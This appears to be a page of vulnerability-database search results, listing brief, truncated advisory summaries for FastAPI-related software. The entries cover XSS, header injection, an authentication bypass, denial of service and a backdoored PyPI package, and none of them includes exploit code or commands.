315 matches found
PT-2025-26621 · Unknown +1 · Visionatrix +1
Name of the Vulnerable Software and Affected Versions: Visionatrix versions 1.5.0 through 2.5.0 Description: The issue concerns a Reflected XSS Cross-Site Scripting attack via the "/docs/flows" endpoint, allowing full takeover of the application and exfiltration of secrets stored in the...
CVE-2024-40627
Fastapi OPA is an opensource fastapi middleware which includes auth flow. HTTP OPTIONS requests are always allowed by OpaMiddleware, even when they lack authentication, and are passed through directly to the application. OpaMiddleware allows all HTTP OPTIONS requests without evaluating it against...
CVE-2024-42816
A cross-site scripting XSS vulnerability in the Create Product function of fastapi-admin pro v0.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Name parameter...
CVE-2024-42818
A cross-site scripting XSS vulnerability in the Config-Create function of fastapi-admin pro v0.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Name parameter...
CVE-2025-46814
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...
Use of Less Trusted Source
Overview fastapi-guard is a Security library for FastAPI to control IPs and more. Affected versions of this package are vulnerable to Use of Less Trusted Source via the manipulation of the X-Forwarded-For header. An attacker can inject arbitrary IP addresses into the request by manipulating this...
CVE-2025-46814
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...
CVE-2025-46814
CVE-2025-46814 affects the FastAPI Guard library (pre-2.0.0) and describes an HTTP header injection via the X-Forwarded-For header. The underlying issue allows an attacker to inject arbitrary IP addresses into requests, potentially bypassing IP-based access controls, misleading logs, and imperson...
CVE-2025-46814 FastAPI Guard Remote Header Injection via X-Forwarded-For Manipulation
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...
CVE-2025-46814 FastAPI Guard Remote Header Injection via X-Forwarded-For Manipulation
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...
CVE-2025-46814 FastAPI Guard Remote Header Injection via X-Forwarded-For Manipulation
FastAPI Guard is a security library for FastAPI that provides middleware to control IPs, log requests, and detect penetration attempts. An HTTP header injection vulnerability has been identified in versions prior to 2.0.0. By manipulating the X-Forwarded-For header, an attacker can potentially...
fastapi-guard 注入漏洞
fastapi-guard is a security library for FastAPI by Renzo F Individual Developer that provides middleware to control IPs, log requests and detect penetration attempts. An injection vulnerability exists in fastapi-guard versions prior to 2.0.0, which stems from an HTTP header injection vulnerabilit...
PT-2025-19983
Name of the Vulnerable Software and Affected Versions FastAPI Guard versions prior to 2.0.0 Description An HTTP header injection issue has been identified in FastAPI Guard. By manipulating the X-Forwarded-For header, an attacker can potentially inject arbitrary IP addresses into the request. This...
MAL-2025-191752 Malicious code in helmet-fastapi (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 c1f805932ecbcd95197e98c6e2336eb773252abf5615fe135076d1848cb90395 Package contains hidden code adding a backdoor - a WebSocket path handler which will execute commands sent by an attacker knowing the path. In addition, it add...
Malicious code in helmet-fastapi (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 c1f805932ecbcd95197e98c6e2336eb773252abf5615fe135076d1848cb90395 Package contains hidden code adding a backdoor - a WebSocket path handler which will execute commands sent by an attacker knowing the path. In addition, it add...
CVE-2025-0182
A vulnerability in danswer-ai/danswer version 0.9.0 allows for denial of service through memory exhaustion. The issue arises from the use of a vulnerable version of the starlette package =0.49 via fastapi, which was patched in fastapi version 0.115.3. The vulnerability can be exploited by sending...
CVE-2024-12868
In version 0.3.32 of open-webui, the application uses a vulnerable version of the starlette package through its dependency on fastapi. The starlette package versions =0.49 are susceptible to uncontrolled resource consumption, which can be exploited to cause a denial of service through memory...
GHSA-W466-2WFC-8G58 Open WebUI has vulnerable dependency on starlette via fastapi
In version 0.3.32 of open-webui, the application uses a vulnerable version of the starlette package through its dependency on fastapi. The starlette package versions =0.49 are susceptible to uncontrolled resource consumption, which can be exploited to cause a denial of service through memory...
Open WebUI has vulnerable dependency on starlette via fastapi
In version 0.3.32 of open-webui, the application uses a vulnerable version of the starlette package through its dependency on fastapi. The starlette package versions =0.49 are susceptible to uncontrolled resource consumption, which can be exploited to cause a denial of service through memory...
CVE-2025-0182
A vulnerability in danswer-ai/danswer version 0.9.0 allows for denial of service through memory exhaustion. The issue arises from the use of a vulnerable version of the starlette package =0.49 via fastapi, which was patched in fastapi version 0.115.3. The vulnerability can be exploited by sending...